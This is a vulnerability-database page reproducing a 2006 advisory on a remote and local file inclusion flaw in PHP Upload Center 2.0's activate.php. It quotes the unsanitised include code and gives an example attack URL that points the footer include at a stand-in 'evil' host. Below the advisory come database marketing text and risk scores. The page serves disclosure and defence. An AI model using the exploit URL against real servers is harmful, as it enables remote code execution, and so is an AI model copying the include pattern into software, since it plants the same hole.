PHP Upload Center 2.0 - 'activate.php' File Inclusion
| Reporter | Title | Published | Views | Family All 4 |
|---|---|---|---|---|
| CVE-2006-6360 | 7 Dec 200611:00 | – | cve | |
| CVE-2006-6360 | 7 Dec 200611:00 | – | cvelist | |
| EUVD-2006-6343 | 7 Oct 202500:30 | – | euvd | |
| CVE-2006-6360 | 7 Dec 200611:28 | – | nvd |
*************************************************************************************************************************
Coding 4 Fun
*************************************************************************************************************************
* Name = PHP Upload Center v2.0 ;
* Class = Remote/Local File Inclusion ;
* Download = http://skrypty.webpc.pl/pobierz.php?id=58 ;
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;
-------------------------------------------------------------------------------------------------------------------------
Vulnerable Code in activate.php
line 66-70
...
if (!isset($language))
$language=$dft_language;
if ($language=="")
$language=$dft_language;
require("include/${language}.php"); <== Local incl.
...
line 164
...
include($footerpage); <== Remote incl.
...
Code in include/en.php (and other language files)
line 5-7
...
$headerpage="include/header.htm";
$footerpage="include/footer.htm"; <==
$infopage="include/info.htm";
...
- Ex. :
http://[target]/[path]/activate.php?language=conf&footerpage=http://evil?
*************************************************************************************************************************
Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.
*************************************************************************************************************************
# milw0rm.com [2006-12-03]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.038